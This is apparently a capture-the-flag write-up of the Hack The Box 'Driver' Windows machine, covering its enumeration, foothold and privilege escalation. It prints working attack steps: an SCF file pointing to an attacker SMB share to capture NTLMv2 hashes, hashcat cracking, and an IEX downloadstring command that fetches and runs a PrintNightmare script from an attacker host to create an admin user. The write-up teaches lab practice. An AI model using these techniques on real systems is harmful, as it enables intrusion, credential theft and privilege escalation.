Enumeration
nmap -sC -sS -sV -F 10.10.11.106 >scan.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-16 13:34 EEST
Nmap scan report for 10.10.11.106 (10.10.11.106)
Host is up (0.084s latency).
Not shown: 97 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time:
| date: 2021-10-16T17:34:49
|_ start_date: 2021-10-16T15:11:52
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.57 seconds
If we try to enter to the webpage, it requests a login. I just tried admin - admin and it worked…
After adding driver.htb to /etc/hosts, we can see Firmware Updates as the only working tab.
Getting the foothold
… firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
According to the text in the page, the file is beign uploaded to the SMB share, which the team will review the uploads.
A Shell Command File (.scf) gets executed if the user browses the file. We can include a remote path for the icon and the browse will try to authenticate with its credentials to the given path.
If we upload the SCF @zebra.scf (we can use @ so the file stays at the top of the share) with the given content:
[Shell]
Command=2
IconFile=\\10.10.14.111\share\zebra.ico
[Taskbar]
Command=ToggleDesktop
By using responder, we can grab the user hash:
responder -wrf --lm -v -I tun0
We get the following:
[SMB] NTLMv2 Client : 10.10.11.106
[SMB] NTLMv2 Username : DRIVER\tony
[SMB] NTLMv2 Hash : tony::DRIVER:...
To crack the NTLMv2 Hash, we can dump it to a file (hash.txt) and crack it using hashcat:
hashcat -m 5600 hash.txt /usr/share/dict/rockyou.txt -o cracked.txt
After getting the password, we might be able to login. The shared folders in Samba doesn’t seem to be accessible. I couldn’t find anything for a while, so I decided to do a deeper port scan.
There is a port open :5985, which appears at nmap as an HTTP service but googling it shows it is actually a remote management service for Windows (like a SSH). By using evil-winrm we can connect to the user using the cracked password.
evil-winrm -i 10.10.11.106 -u tony -p *****
Aaand we got the user flag!
Privilege escalation
We don’t have connection to the Internet to download privilege escalation scripts. But we can open a local HTTP server in a folder with the tools:
python -m http.server -d ../Tools 8080
In the reverse shell, we can download them with Invoke-WebRequest.
Invoke-WebRequest http://10.10.14.111:8080/winPEAS.bat -OutFile winpeas.bat
After scanning and not finding anything, I googled the vulnerabilities available for the current version. The most recent one is about Printer Spooler (PrintNightmare), which let’s you escale privileges easily.
To use the CVE exploit, I followed this blog post. As a summary, you have to start the SMB service in your host, share a .dll which contains a reverse shell, call the python exploit and wait for the shell to connect.
After those steps, we have authority.
C:\Windows\system32>whoami
nt authority\system
Then, we can get the root flag as usual by going to the Administrator’s desktop.
C:\Users\Administrator\Desktop>type root.txt
******************
To know more
First of all, I was lucky to hit the right with the Printer Spooler, but the correct way to check it was to
rpcdump.py @10.10.11.106 | grep MS-RPRN
We can only run the printnightmare exploit when the Print System Remote Protocol exists.
That script gave us access to the Administrator account. Although, it seems like he has not many administrator rights (in order to own the whole machine). Another way to perform the printnightmare exploit is by running the script locally from tony’s PS session.
By using upload command we can upload our local copy of the exploit so user tony can execute it. But the Execution Policy is restricted, so we are not able to run the script as usual. We have to bypass the Execution Policy (there are a lot of ways, but I chose a simple one) by using the IEX command.
python -m http.server 8001
IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.108:8001/CVE-2021-1675.ps1')
The IEX command automatically imports the module, so we can simply run:
Invoke-Nightmare -NewUser "zebra" -NewPassword "zebra1234"
And connect to the new user with evil-winrm, this one will have all the administrator rights.
References
- More info about PrintNightmare:
- Invoke-Nightmare powershell module
